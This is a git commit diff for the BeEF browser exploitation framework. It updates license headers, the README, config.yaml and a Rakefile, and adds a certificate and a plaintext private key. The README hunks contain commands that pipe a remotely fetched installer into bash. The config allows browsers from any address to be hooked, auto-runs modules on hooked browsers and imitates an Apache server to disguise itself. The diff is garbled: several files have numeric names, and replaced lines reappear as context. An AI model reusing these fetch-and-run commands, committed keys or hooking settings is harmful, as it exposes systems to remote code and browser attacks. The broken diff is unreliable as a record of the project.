Update version to '0.4.4.4.1-alpha' bug fix edition

Fix bug with module image result rendering in admin UI
Update webcam module so the picture returned as a base64 encoded string
2013-05-01 17:49:21 +09:30 · 2013-05-01 17:47:00 +09:30 · 2013-05-01 16:44:28 +09:30 · 2013-05-01 16:43:26 +09:30 · 2013-04-30 18:56:37 +09:30 · 2013-04-30 18:40:25 +09:30
878 changed files with 22047 additions and 11180 deletions
--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,8 @@
 beef.db
 test/msf-test
-custom-config.yaml
+custom-config.yaml
 .DS_Store
 .gitignore
 .rvmrc
 *.lock
--- a/BeEFLive.sh
+++ b/BeEFLive.sh
@@ -0,0 +1,2 @@
 # Reference for old (<1.2) versions of BeEF Live
 bash /opt/beef/liveCD/BeEFLive.sh
--- a/23
+++ b/23
@@ -1,29 +1,17 @@
 # BeEF's Gemfile
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 # Gems only required on Windows, or with specific Windows issues
 if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
  gem "win32console"
  gem "eventmachine", "1.0.0.beta.4.1"
 else
  gem "eventmachine", "0.12.10"
 end
 gem "eventmachine", "1.0.3"
 gem "thin"
 gem "sinatra", "1.3.2"
 gem "em-websocket", "~> 0.3.6"
@@ -39,6 +27,9 @@ gem "erubis"
 gem "dm-migrations"
 gem "msfrpc-client"
 # notifications
 gem "twitter"
 if ENV['BEEF_TEST']
 # for running unit tests
  gem "test-unit"
--- a/INSTALL.txt
+++ b/INSTALL.txt
@@ -1,18 +1,8 @@
 ===============================================================================
-   Copyright 2012 Wade Alcorn wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
-   Licensed under the Apache License, Version 2.0 (the "License");
+    See the file 'doc/COPYING' for copying permission
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
 ===============================================================================
--- a/158
+++ b/158
@@ -1,84 +1,74 @@
-===============================================================================
+===============================================================================
-   
+   
-   Copyright 2012 Wade Alcorn wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
-   Licensed under the Apache License, Version 2.0 (the "License");
+    See the file 'doc/COPYING' for copying permission
-   you may not use this file except in compliance with the License.
+
-   You may obtain a copy of the License at
+===============================================================================
-
+
-       http://www.apache.org/licenses/LICENSE-2.0
+What is BeEF?
-
+-------------
-   Unless required by applicable law or agreed to in writing, software
+
-   distributed under the License is distributed on an "AS IS" BASIS,
+BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
-   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
-   See the License for the specific language governing permissions and
+Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
-   limitations under the License.
+
-
+
-===============================================================================
+Get Involved 
-
+------------
-What is BeEF?
+
-------------
+You can get in touch with the BeEF team. Just check out the following: 
-
+
-BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
+
-
+Please, send us pull requests!
-Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
+
-
+Web: http://beefproject.com/
-
+
-Get Involved 
+Mail: beef-subscribe@bindshell.net
------------
+
-
+IRC: ircs://irc.freenode.net/beefproject
-You can get in touch with the BeEF team. Just check out the following: 
+
-
+Twitter: @beefproject
-
+
-Please, send us pull requests!
+
-
+Requirements
-Web: http://beefproject.com/
+------------
-
+
-Mail: beef-subscribe@bindshell.net
+* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
-
+* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
-IRC: ircs://irc.freenode.net/beefproject
+* [SQLite](http://sqlite.org) 3.x
-
+* The following GEMS: 
-Twitter: @beefproject
+   - bundler 
-
+   - thin
-
+   - Sinatra 
-Requirements
+   - ANSI 
------------
+   - TERM-ANSIcolor 
-
+   - dm-core 
-* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
+   - json 
-* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
+   - data_objects 
-* [SQLite](http://sqlite.org) 3.x
+   - dm-sqlite-adapter 
-* The following GEMS: 
+   - parseconfig 
-   - bundler 
+   - erubis 
-   - thin
+   - dm-migrations 
-   - Sinatra 
+   - msfrpc-client 
-   - ANSI 
+   - eventmachine
-   - TERM-ANSIcolor 
+   - win32console (Windows Only)
-   - dm-core 
+
-   - json 
+
-   - data_objects 
+Quick Start
-   - dm-sqlite-adapter 
+----------- 
-   - parseconfig 
+
-   - erubis 
+__The following is for the impatient.__ 
-   - dm-migrations 
+
-   - msfrpc-client 
+For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
-   - eventmachine
+
-   - win32console (Windows Only)
+   $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
-
+
-
+
-Quick Start
+Usage 
----------- 
+----- 
-
+
-__The following is for the impatient.__ 
+To get started, simply execute beef and follow the instrustions: 
-
+
-For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
+   $ ./beef
-
+
   $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
 Usage 
 ----- 
 To get started, simply execute beef and follow the instrustions: 
   $ ./beef
--- a/README.mkd
+++ b/README.mkd
@@ -1,84 +1,74 @@
-===============================================================================
+===============================================================================
-   
+   
-   Copyright 2012 Wade Alcorn wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
-   Licensed under the Apache License, Version 2.0 (the "License");
+    See the file 'doc/COPYING' for copying permission
-   you may not use this file except in compliance with the License.
+
-   You may obtain a copy of the License at
+===============================================================================
-
+
-       http://www.apache.org/licenses/LICENSE-2.0
+What is BeEF?
-
+-------------
-   Unless required by applicable law or agreed to in writing, software
+
-   distributed under the License is distributed on an "AS IS" BASIS,
+__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser.
-   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
-   See the License for the specific language governing permissions and
+Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
-   limitations under the License.
+
-
+
-===============================================================================
+Get Involved 
-
+------------
-What is BeEF?
+
-------------
+You can get in touch with the BeEF team. Just check out the following: 
-
+
-__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser.
+
-
+__Please, send us pull requests!__
-Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
+
-
+__Web:__ http://beefproject.com/
-
+
-Get Involved 
+__Mail:__ beef-subscribe@bindshell.net
------------
+
-
+__IRC:__ ircs://irc.freenode.net/beefproject
-You can get in touch with the BeEF team. Just check out the following: 
+
-
+__Twitter:__ @beefproject
-
+
-__Please, send us pull requests!__
+
-
+Requirements
-__Web:__ http://beefproject.com/
+------------
-
+
-__Mail:__ beef-subscribe@bindshell.net
+* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
-
+* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
-__IRC:__ ircs://irc.freenode.net/beefproject
+* [SQLite](http://sqlite.org) 3.x
-
+* The following GEMS: 
-__Twitter:__ @beefproject
+   - bundler 
-
+   - thin
-
+   - Sinatra 
-Requirements
+   - ANSI 
------------
+   - TERM-ANSIcolor 
-
+   - dm-core 
-* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
+   - json 
-* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
+   - data_objects 
-* [SQLite](http://sqlite.org) 3.x
+   - dm-sqlite-adapter 
-* The following GEMS: 
+   - parseconfig 
-   - bundler 
+   - erubis 
-   - thin
+   - dm-migrations 
-   - Sinatra 
+   - msfrpc-client 
-   - ANSI 
+   - eventmachine
-   - TERM-ANSIcolor 
+   - win32console (Windows Only)
-   - dm-core 
+
-   - json 
+
-   - data_objects 
+Quick Start
-   - dm-sqlite-adapter 
+----------- 
-   - parseconfig 
+
-   - erubis 
+__The following is for the impatient.__ 
-   - dm-migrations 
+
-   - msfrpc-client 
+For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
-   - eventmachine
+
-   - win32console (Windows Only)
+       $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
-
+
-
+
-Quick Start
+Usage 
----------- 
+----- 
-
+
-__The following is for the impatient.__ 
+To get started, simply execute beef and follow the instructions: 
-
+
-For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
+       $ ./beef
-
+
       $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
 Usage 
 ----- 
 To get started, simply execute beef and follow the instructions: 
       $ ./beef
--- a/22
+++ b/22
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 task :default => ["quick"]
@@ -86,10 +76,10 @@ end
@beef_process_id = nil;
 task :beef_start => 'beef' do
-  printf "Starting BeEF (wait 10 seconds)..."
+  printf "Starting BeEF (wait a few seconds)..."
  @beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
-  delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
+  delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
-  delays.each do |i| # delay for 10 seconds
+  delays.each do |i| # delay for a few seconds
    printf '.'
    sleep (i)
  end
--- a/18
+++ b/18
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
-0.4.3.5-alpha
+0.4.4.4.1-alpha
--- a/27
+++ b/27
@@ -1,19 +1,9 @@
 #!/usr/bin/env ruby
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 # stop deprecation warning from being displayed
@@ -81,7 +71,7 @@ Socket.do_not_reverse_lookup = true
 case config.get("beef.database.driver")
  when "sqlite"
    DataMapper.setup(:default, "sqlite3://#{$root_dir}/#{config.get("beef.database.db_file")}")
-  when "mysql","postgres"
+  when "mysql", "postgres"
    DataMapper.setup(:default,
                     :adapter => config.get("beef.database.driver"),
                     :host => config.get("beef.database.db_host"),
@@ -124,12 +114,13 @@ print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"
 #@note Starts the WebSocket server
 if config.get("beef.http.websocket.enable")
  BeEF::Core::Websocket::Websocket.instance
-  print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], secure [#{config.get("beef.http.websocket.secure")}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
+  print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
  if config.get("beef.http.websocket.secure")
    print_info "Starting WebSocketSecure server on port [#{config.get("beef.http.websocket.secure_port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
  end
 end
 # @note Call the API method 'pre_http_start'
 BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)
@@ -140,7 +131,7 @@ if config.get("beef.extension.console.shell.enable") == true
  begin
    FileUtils.mkdir_p(File.expand_path(config.get("beef.extension.console.shell.historyfolder")))
    BeEF::Extension::Console::Shell.new(BeEF::Extension::Console::Shell::DefaultPrompt,
-                                        BeEF::Extension::Console::Shell::DefaultPromptChar,{'config' => config, 'http_hook_server' => http_hook_server}).run
+                                        BeEF::Extension::Console::Shell::DefaultPromptChar, {'config' => config, 'http_hook_server' => http_hook_server}).run
  rescue Interrupt
  end
 else
--- a/beef_cert.pem
+++ b/beef_cert.pem
@@ -0,0 +1,19 @@
 -----BEGIN CERTIFICATE-----
 MIIDDjCCAnegAwIBAgIJAKNYRH/AaB3DMA0GCSqGSIb3DQEBBQUAMIGfMQswCQYD
 VQQGEwJBVTEUMBIGA1UECAwLQm92aW5lIExhbmQxDTALBgNVBAcMBEJlRUYxDTAL
 BgNVBAoMBEJlRUYxDTALBgNVBAsMBEJlRUYxJzAlBgNVBAMMHkJyb3dzZXIgRXhw
 bG9pdGF0aW9uIEZyYW1ld29yazEkMCIGCSqGSIb3DQEJARYVQmVFRkBkb250d3Jp
 dGVtZS5CZUVGMB4XDTEyMDgwNjEzMDUzOFoXDTEzMDgwNjEzMDUzOFowgZ8xCzAJ
 BgNVBAYTAkFVMRQwEgYDVQQIDAtCb3ZpbmUgTGFuZDENMAsGA1UEBwwEQmVFRjEN
 MAsGA1UECgwEQmVFRjENMAsGA1UECwwEQmVFRjEnMCUGA1UEAwweQnJvd3NlciBF
 eHBsb2l0YXRpb24gRnJhbWV3b3JrMSQwIgYJKoZIhvcNAQkBFhVCZUVGQGRvbnR3
 cml0ZW1lLkJlRUYwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALCxzu+rOTt2
 VBM5X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP
 0l+pKgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0Z
 F/0y0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAGjUDBOMB0GA1UdDgQWBBTaXny0
 kTye7CAr0ronsg0ob63+kTAfBgNVHSMEGDAWgBTaXny0kTye7CAr0ronsg0ob63+
 kTAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBABTy5s/XRd6iBwxOgV6N
 B+cTRgmgHciujbI+0p4TkOkHvQPhhcD3207ndWWwv+Mc2XeQcXNaOfYUDkeCs64N
 JffqThykYOdagvCu1Gecw9BEKeijS9MAuNvtvP7fcUNUql+VeTFbxMBPGDhusafz
 GkY0IBg9+j6XX4JwEXxCGt0a
 -----END CERTIFICATE-----
--- a/beef_key.pem
+++ b/beef_key.pem
@@ -0,0 +1,16 @@
 -----BEGIN PRIVATE KEY-----
 MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBALCxzu+rOTt2VBM5
 X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP0l+p
 KgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0ZF/0y
 0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAECgYAKpDrNTmedACxiGAN8hPXGKCw3
 HlLuBKTRLJ/Mgel29DxeIy5gXnAuCaQzXKKTPabJxIugj5r9pH4MCtkf1T15Aib6
 4MFdx4UegllMUo7eUiuCtSmK9s0wEtJjShujBl4qQ10ZtWUh4Vd/clS88IjM/iPI
 5Ocoph5PUgFt/tX7DQJBAOkGptgdri39bRiSGaR/Si6YYpmMUFoQt+s2id8yH9QS
 26o8cHZKCahSiWLNi4rSzEJIOpXnP3n+Dcq2JttDWGcCQQDCHWgWSpdnX8uqp/Qo
 yp0RZJwyBFoba4bWhzoQJj+39P0+4FBaMlZyLHZ7nd4z0JiE5S3qA9xi8zjQVrrI
 rTWnAkEAmpPxBZfavWNJhW0VWYue1/36GkV73+MLPhq1pruHZZUE5o6lQ7KlaWUn
 AcW79WEUYjursVjvQKuI1pmyeOzZrQJBAIGQHSxbxyjBgPA8QDSF4EZ+r96Wlwoc
 QBiqk6+5x+fiBrJUCG3bkWWNldu2qFxPS63QRlAfGZeWHgK5ENzm95sCQQCe81hU
 WaVM9bmt0ZvfhfQXfgvf3xKNUFemd4skTMUDgNCH1OFULB/Mz16kJDdy0q0qUS88
 yBgay+U9QuoEO425
 -----END PRIVATE KEY-----
--- a/config.yaml
+++ b/config.yaml
@@ -1,35 +1,29 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 # BeEF Configuration file
 beef:
-    version: '0.4.3.5-alpha'
+    version: '0.4.4.4.1-alpha'
    debug: false
    restrictions:
-        # subnet of browser ip addresses that can hook to the framework 
+        # subnet of browser ip addresses that can hook to the framework
        permitted_hooking_subnet: "0.0.0.0/0"
-        # subnet of browser ip addresses that can connect to the UI 
+        # subnet of browser ip addresses that can connect to the UI
        # permitted_ui_subnet: "127.0.0.1/32"
        permitted_ui_subnet: "0.0.0.0/0"
-    
+
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"
        # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
        # It's not advised to decrease it with tons of hooked browsers (more than 50),
        # because it might impact performance. Also, enable WebSockets is generally better.
        xhr_poll_timeout: 5000
        # if running behind a nat set the public ip address here
        #public: ""
        #public_port: "" # port setting is experimental
@@ -42,25 +36,40 @@ beef:
        # Prefer WebSockets over XHR-polling when possible.
        websocket:
          enable: false
-          secure: false # use WebSocketSecure
+          secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
-          port: 11989
+          port: 61985 # WS: good success rate through proxies
-          alive_timer: 1000 # poll BeEF every second
+          secure_port: 61986 # WSSecure
          ws_poll_timeout: 1000 # poll BeEF every second
        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
-            enable: false
+            enable: true
            type: "apache" #supported: apache, iis
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.dns (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"
    database:
        # For information on using other databases please read the
        # README.databases file
        # supported DBs: sqlite, mysql, postgres
        # NOTE: you must change the Gemfile adding a gem require line like:
        #   gem "dm-postgres-adapter"
        # or
        #   gem "dm-mysql-adapter"
        # if you want to switch drivers from sqlite to postgres (or mysql).
        # Finally, run a 'bundle install' command and start BeEF.
        driver: "sqlite"
        # db_file is only used for sqlite
        db_file: "beef.db"
-        
+
        # db connection information is only used for mysql/postgres
        db_host: "localhost"
        db_name: "beef"
@@ -73,18 +82,33 @@ beef:
        user:   "beef"
        passwd: "beef"
    # Autorun modules as soon the browser is hooked.
    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
    autorun:
        enable: true
        # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
        allow_user_notify: true
    crypto_default_value_length: 80
    # Enable client-side debugging
    client:
        debug: false
    # You may override default extension configuration parameters here
    extension:
        requester:
-            enable: true 
+            enable: true
        proxy:
-            enable: true 
+            enable: true
        metasploit:
            enable: false
-        console:
+        social_engineering:
-            shell:
+            enable: true
                enable: false
        evasion:
            enable: false
        console:
             shell:
                enable: false
        ipec:
            enable: true
--- a/core/api.rb
+++ b/core/api.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
--- a/core/api/extension.rb
+++ b/core/api/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
--- a/core/api/extensions.rb
+++ b/core/api/extensions.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
  module API
--- a/core/api/main/configuration.rb
+++ b/core/api/main/configuration.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module API
--- a/core/api/main/migration.rb
+++ b/core/api/main/migration.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module API
--- a/core/api/main/network_stack/assethandler.rb
+++ b/core/api/main/network_stack/assethandler.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module API
--- a/core/api/main/server.rb
+++ b/core/api/main/server.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module API
--- a/core/api/main/server/hook.rb
+++ b/core/api/main/server/hook.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 module BeEF
 module API
--- a/core/api/module.rb
+++ b/core/api/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
